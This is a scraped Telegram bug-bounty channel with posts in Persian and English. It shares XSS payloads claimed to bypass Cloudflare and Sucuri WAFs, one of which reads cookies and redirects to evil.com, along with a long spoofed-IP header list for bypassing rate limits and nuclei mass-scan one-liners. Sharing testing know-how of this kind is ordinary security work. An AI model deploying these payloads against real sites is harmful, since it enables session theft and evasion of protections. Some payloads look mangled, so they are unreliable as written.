Bugbounty Tips – Telegram
Bugbounty Tips
2.92K subscribers
84 photos
6 videos
13 files
92 links
research and sharing in cybersecurity
Download Telegram
Forwarded from HuntLearn (Iraji Moghaddam)
پلتفرم آموزشی هانت‌لرن قصد دارد میزبان کنفرانس‌های سایبری ماهانه باشد! در این رویدادها، هکرها هر ماه به صورت آنلاین گرد هم می‌آیند تا دستاوردها، تحقیقات، اخبار و موضوعات مهم یک ماه اخیر را با یکدیگر به اشتراک بگذارند. یک گردهمایی مهیج و کاملاً مفید برای همه، که حضور در آن برای همگان رایگان و آزاده. همچنین، هر کسی میتونه ارائه خودش رو در این کنفرانس‌ها داشته باشه پس اگه حس میکنید موضوع جذابی برای ارائه دارید، موضوع‌های خودتون رو جمع کنید و آماده ارائه دادن بشید!
منتظر خبرهای بیشتر از ما در این باره باشید!
4🔥2
CAPTCHA Bypass Methods



For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#Web
#Payloads
#BugBounty
👍42🔥2
Forwarded from sn0whacks
🔥پیلود XSS برای دور زدن CloudFlare WAF:

‘>alert(154)</noscript><noscript/154=’;;;;;;;

@sn0whacks
#bugbountyTips
👍121
خبرهاییه
🤝3
Forwarded from 🔴 خبر فوری | اخبار لحظه ای | اخبار جنگ (Dirin)
This media is not supported in your browser
VIEW IN TELEGRAM
آسمان تل آویو هم اکنون

✔️ @khabarforieh
👍12🔥1
Use Akamai-Client-Ip instead of XFF to override YOUR IP to 127.0.0.1

For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#Web
#Payloads
#bugbounty
🔥8
Rate Limit Bypass using HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
PROXY: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
Source-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Via: 127.0.0.1
VIA: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
X-Backend-Host: 127.0.0.1
X-BlueCoat-Via: 127.0.0.1
X-Cache-Info: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-From-IP: 127.0.0.1
X-From: 127.0.0.1
X-Gateway-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Ip: 127.0.0.1
X-Original-Host: 127.0.0.1
X-Original-IP: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originally-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyMesh-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-True-Client-IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
Z-Forwarded-For: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1


For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#Web
#Payloads
#bugbounty
7🔥2
this will help you to Bypass csp
http://cspbypass.com/


For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#Web
#Payloads
#bugbounty
بچه ها این رایتاپ تیم دوم مسابقات المپیک راوین در مرحله مقدماتیه
پ.ن: ASIS خشن مینوازد😂😂
یکی از تیم های ایرانی در حال توسعه یک پلتفرمی هستش که آنلاین این فیچر هارو تست میکنه و خروجی خیلی خوبی میده، این پلتفرم بتا و درحال تغییره و بنظرم پروژه خوبیه حتما ازش استفاده کنید.
Recon
Vulnerability Detection
Github Detective
URL Crawler
همراه با خروجی مناسب
پیشنهاد میشه سر بزنید و نظرتونو بگید زیر همین پست، توی چنل هستن نظراتو میخونن و مطابق با نیاز‌ها مشکل هارو فیکس میکنند و کیفیت رو ارتقا میدند.
https://hackerium.io


For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#bugbounty
#web
#Pentest
👍133
👍7
یک چنل با محتوای بدرد بخور:
https://news.1rj.ru/str/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.

For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#LINK
#WEB
👍15🔥1
Bugbounty Tips pinned Deleted message
https://github.com/coffinxp/nuclei-templates



how to use in bug bounty programs:
subfinder -d xyz.com -all  | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all  | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all  | nuclei -t iis.yaml
subfinder -d xyz.com -all  | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all  | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50

For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#LINK
#WEB
👍5👎1🔥1
دوستان کار نشد نداره حتی کمپانی که بزرگه تیم امنیت داره و... هم میتونه آسیب پذیری های خطرناکی داشته باشه چه بسا تیم داخلی بصورت وایت باکس و بلک باکس تست کنه و همچنین پنتست سالینه خارج از سازمان بشه،اسکیلاتونو لول آپ کنین
عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..
11👍3
Bugbounty Tips pinned Deleted message
Sucuri WAF Bypass:


payload:
<a aa aaa aaaa aaaaaa href=j&#97v&#97noscript&#x3A;&#97lert(document.cookie)>ClickMe


<a href="j&#97;vanoscript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://evil.com';">ClickMe</a>



For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#LINK
#WEB
👍3👀2
Email-verification-bypass.mkv
56.6 MB
سلام دوستان برای Email Verification bypass یک ویدیو براتون آماده کردم که روی برنامه پابلیک هکروان بود
(https://hackerone.com/opensea?type=team)
با توضیحات آسیب پذیری که تجربه یک سناریو ساده و کاربردی رو بهتون انتقال میده، امیدوارم براتون مفید باشه
تایتل آسیب پذیری:
Email Verification Bypass

For more join to channel (:

https://news.1rj.ru/str/rootdr_research
#Video
#Writeup
👍208🤝2🔥1👏1